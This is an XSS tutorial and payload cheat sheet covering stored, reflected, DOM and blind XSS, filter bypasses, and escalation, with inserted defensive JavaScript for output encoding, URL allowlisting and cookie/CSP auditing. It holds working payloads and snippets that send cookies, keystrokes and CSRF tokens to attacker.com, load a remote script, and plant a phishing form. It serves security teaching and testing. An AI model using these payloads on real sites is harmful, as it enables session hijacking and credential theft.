XSS (cross-site scripting) is a web security vulnerability that allows an attacker to execute arbitrary scripts in a victim's browser by injecting malicious code into a vulnerable web application.
Impact of XSS
Session Hijacking: Stealing cookies for authentication bypass
User Redirection: Redirecting victims to malicious sites
Data Theft: Extracting CSRF tokens, credentials, or other sensitive data
Keylogging: Capturing keystrokes for credential theft
Defacement: Modifying content on the victim's screen

Types of XSS
1. Stored XSS (Persistent XSS): The payload is stored permanently in a database or logs. It affects all users who view the infected page.
Example: Injecting XSS in a comment section:
<script>alert('Stored XSS');</script>
Exploitation Tip: Target user-generated content like forums, profiles, or message boards.

2. Reflected XSS: The payload is immediately reflected in the response. It requires social engineering (the victim must click a link).
Example:
https://example.com/search?q=<script>alert('Reflected XSS');</script>
Exploitation Tip: Try injecting payloads into search bars, error messages, or input fields.

3. DOM-Based XSS: The payload is executed client-side via JavaScript manipulation.
Example:
var userInput = location.hash.substr(1);
document.write("<h1>" + userInput + "</h1>");
Visiting https://example.com/#<script>alert('DOM XSS')</script> executes the script.
Exploitation Tip: Look for innerHTML, document.write(), eval(), setTimeout() handling user input.

4. Blind XSS: A type of Stored XSS where the payload executes in an unseen part of the application, such as an admin panel or internal logs.
Example: Submitting a payload in a support ticket form that later executes for an admin.
<script src="http://attacker.com/blind.js"></script>
Exploitation Tip: Use tools like XSS Hunter to automate detection.

XSS: Finding Input Points
User input fields: Comment sections, search bars, contact forms, etc.
Try injecting a unique test string (XSS_TEST_STRING_123) and check if it appears in the response.
Modify HTTP requests using Burp Suite to bypass client-side filters.

Inserting XSS Payloads
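The marker-string check from the Finding Input Points section, written out as an added example (not code from the original article): classifyReflection is an assumed name, the marker wraps XSS_TEST_STRING_123 in the characters that actually matter for XSS, and SAMPLE_RESPONSES are constructed response bodies, not real traffic. The point the plain test string misses is that a parameter can be reflected and still be safe, so the check distinguishes a raw reflection from an HTML-encoded one.

```javascript
// Added example (not from the original article): classify how a search page
// reflects a marker string, so a test suite can flag raw reflection.

// The token alone proves reflection; the tag opener, quote and attribute
// closer around it prove whether the reflection is encoded.
const MARKER_TOKEN = 'XSS_TEST_STRING_123';
function makeMarker() {
  return '<"' + MARKER_TOKEN + '">';
}

// What the marker looks like after correct HTML entity encoding.
function encodedForm(marker) {
  const table = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return marker.replace(/[&<>"']/g, (c) => table[c]);
}

// Returns one of:
//   'raw'     -> marker present with < and " intact: output encoding is missing
//   'encoded' -> marker present only as entities: output encoding is in place
//   'partial' -> token present but the special characters were stripped or
//                only partly encoded: needs manual review of the context
//   'absent'  -> the parameter is not reflected at all
function classifyReflection(body, marker) {
  if (body.includes(marker)) return 'raw';
  if (body.includes(encodedForm(marker))) return 'encoded';
  if (body.includes(MARKER_TOKEN)) return 'partial';
  return 'absent';
}

// Constructed sample responses (not real traffic) for the same search page.
const SAMPLE_RESPONSES = {
  vulnerable: '<p>Results for <"XSS_TEST_STRING_123"></p>',
  encoded: '<p>Results for &lt;&quot;XSS_TEST_STRING_123&quot;&gt;</p>',
  stripped: '<p>Results for XSS_TEST_STRING_123</p>',
  unrelated: '<p>No results</p>',
};

// Run the classifier over every sample and return the verdicts by name.
function auditSamples() {
  const marker = makeMarker();
  const verdicts = {};
  for (const [name, body] of Object.entries(SAMPLE_RESPONSES)) {
    verdicts[name] = classifyReflection(body, marker);
  }
  return verdicts;
}

console.log(auditSamples());
```

A 'partial' verdict is the interesting one in practice: a page that encodes < but leaves " alone is safe in text context and unsafe inside a quoted attribute, which is why the surrounding markup has to be read before calling it fixed.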
Basic PoC: <script>alert('XSS Found');</script>
Injecting into an image tag (bypassing filters): <img src=x onerror=alert('XSS')>
Using the javascript: scheme in URLs: javascript:alert('XSS')
Data URI XSS (optionally base64-encoded) for bypassing filters: data:text/html,<script>alert('XSS')</script>

XSS Exploitation Techniques
1. If <script> tags are blocked, inject JavaScript into HTML attributes:
<img src=x onerror=alert('XSS')>
<a href="#" onclick="alert('XSS')">Click Me</a>

2. Some applications reflect headers like Referer or User-Agent:
User-Agent: <script>alert('XSS')</script>
Try injecting payloads in HTTP request headers and check reflected responses.

3. Injecting JavaScript in Form Actions:
<form action="javascript:alert('XSS')">
<input type="submit" value="Submit">
</form>

4. JavaScript Execution via CSS Attributes (legacy browsers only; current browsers do not execute javascript: URLs referenced from CSS):
<style>
@import "javascript:alert('XSS')";
</style>
Bypassing XSS Filters
Bypass string filtering by using variations of the script tag:
<ScRiPt>alert('XSS')</sCrIpT>
Use String.fromCharCode() to avoid using quotes (the character codes below spell alert(1)):
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
If your input is inside an attribute, break out of it:
"><script>alert('XSS')</script>
JavaScript inside <svg> tags:
<svg onload=alert('XSS')>
Exploiting template injection (a script inside <template> is inert until the application clones the template contents into the live document):
<template><script>alert('XSS')</script></template>
Injecting script via data URIs:
data:text/html,<script>alert('XSS')</script>
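The following is an added example, not code from the original article. It puts the case-variant and attribute-breakout bypasses above next to the defence that does not depend on a blocklist: naiveScriptFilter mimics the kind of filter <ScRiPt> defeats; escapeHtml, escapeAttr and safeUrl are assumed names for context-aware output encoding and a URL scheme allowlist; renderHeading is a hardened rewrite of the document.write example from the Types of XSS section, and renderLink covers the javascript: and data: payloads from the payload list.

```javascript
// Added example (not from the original article): why a blocklist fails and
// what context-aware output encoding does instead. Pure functions, runs in Node.

// A naive blocklist of the kind the bypass section defeats: it removes the
// literal tags <script> and </script> but is case-sensitive.
function naiveScriptFilter(input) {
  return input.split('<script>').join('').split('</script>').join('');
}

// Encoding for the HTML text context (between tags): every character that
// can start a tag or an entity becomes an entity, whatever its case.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Encoding for a double-quoted attribute value: the same table, so the
// "><script> breakout cannot close the quote or the tag.
function escapeAttr(s) {
  return escapeHtml(s);
}

// URL context: encoding is not enough, because javascript: and data: URLs
// are ordinary attribute text. Allowlist the scheme instead. The URL parser
// drops tab/newline anywhere and leading/trailing controls before reading
// the scheme, so do the same before comparing (assumed allowlist below).
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function safeUrl(url) {
  const cleaned = String(url)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(cleaned);
  if (m && !ALLOWED_SCHEMES.has(m[1].toLowerCase())) return 'about:blank';
  return cleaned; // relative URL or allowed scheme
}

// Hardened version of the DOM XSS example from the Types of XSS section:
// the untrusted value is encoded for the text context it lands in.
function renderHeading(userInput) {
  return '<h1>' + escapeHtml(userInput) + '</h1>';
}

// Hardened link: scheme allowlist for href, attribute encoding for the value,
// text encoding for the link text.
function renderLink(href, text) {
  return '<a href="' + escapeAttr(safeUrl(href)) + '">' + escapeHtml(text) + '</a>';
}

console.log(naiveScriptFilter('<ScRiPt>alert(1)</sCrIpT>')); // blocklist misses it
console.log(renderHeading('<ScRiPt>alert(1)</sCrIpT>'));     // encoder neutralises it
console.log(renderLink('javascript:alert(1)', 'Click Me'));
```

Encoding is chosen by output context: the same table covers text and quoted attributes, but href, src and form action values need the scheme allowlist because javascript: and data: contain nothing an encoder would touch. safeUrl strips tabs and newlines before looking at the scheme because the browser's URL parser does, which is what lets a payload such as java<TAB>script: past a check that only looks at the raw prefix.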
Escalating XSS Attacks
1. Stealing Cookies (Session Hijacking): Use HttpOnly cookies to prevent JavaScript access.
<script>document.location = 'http://attacker.com/cookie?c=' + document.cookie;</script>
2. Keylogging User Input: Log keystrokes from login forms.
<script>document.onkeypress = function(e) {
fetch('http://attacker.com/log?key=' + e.key);
};
</script>
3. Extracting CSRF Tokens: Attackers can perform unauthorized actions on behalf of victims.
var token = document.getElementById('csrf-token').value;
fetch('http://attacker.com/?token=' + token);
4. Phishing via Fake Login Page: Tricking users into entering credentials on a fake page.
document.body.innerHTML = '<form action="http://attacker.com"><input type="text" name="user"><input type="password" name="pass"><input type="submit"></form>';
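An added example, not from the original article, for the mitigation side of this section: auditSetCookie and auditCsp are assumed names that check a Set-Cookie header for the HttpOnly flag mentioned under Stealing Cookies (plus Secure and SameSite) and a Content-Security-Policy header for the settings that let the inline <script> payloads above run and let fetch() send keystrokes or tokens to an arbitrary host. SAMPLE_HEADERS are constructed values, and the CSP check is a simplified reading of the policy (script-src and connect-src with their default-src fallback), not a full CSP evaluator.

```javascript
// Added example (not from the original article): audit the two response
// headers that blunt the escalations in this section.

// Set-Cookie: report which of HttpOnly, Secure and SameSite are missing.
// HttpOnly is the one that keeps document.cookie away from script.
function auditSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const attrs = new Set(parts.slice(1).map((p) => p.split('=')[0].toLowerCase()));
  const missing = [];
  if (!attrs.has('httponly')) missing.push('HttpOnly');
  if (!attrs.has('secure')) missing.push('Secure');
  if (!attrs.has('samesite')) missing.push('SameSite');
  return { name: parts[0].split('=')[0], missing };
}

// Split a CSP header into { directive: [source, ...] }.
function parseCsp(header) {
  const directives = {};
  for (const d of header.split(';')) {
    const tokens = d.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// Simplified CSP check. script-src and connect-src fall back to default-src;
// with neither present there is no restriction. 'unsafe-inline' permits the
// inline <script> payloads unless a nonce or hash is also listed (browsers
// then ignore it). '*' permits any host for scripts or fetch() targets.
function auditCsp(header) {
  const d = parseCsp(header);
  const script = d['script-src'] || d['default-src'];
  const connect = d['connect-src'] || d['default-src'];
  const findings = [];
  if (!script) {
    findings.push('no script-src or default-src: inline scripts allowed');
  } else {
    const hasNonceOrHash = script.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
    if (script.includes("'unsafe-inline'") && !hasNonceOrHash) findings.push("script-src allows 'unsafe-inline'");
    if (script.includes('*')) findings.push('script-src allows any host');
  }
  if (!connect) {
    findings.push('no connect-src or default-src: fetch() to any origin allowed');
  } else if (connect.includes('*')) {
    findings.push('connect-src allows any host');
  }
  return findings;
}

// Constructed sample headers (not from a real application).
const SAMPLE_HEADERS = {
  weakCookie: 'session=abc123; Path=/',
  strongCookie: 'session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  weakCsp: "default-src 'self'; script-src 'self' 'unsafe-inline'",
  strongCsp: "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; connect-src 'self'",
};

console.log(auditSetCookie(SAMPLE_HEADERS.weakCookie));
console.log(auditCsp(SAMPLE_HEADERS.weakCsp));
```

Note the limits of the two controls against the payloads above: connect-src governs fetch() but not the document.location redirect used by the cookie-theft snippet, so HttpOnly is the control for that one, and a CSP only helps the phishing form if form-action is also restricted, which this check does not look at.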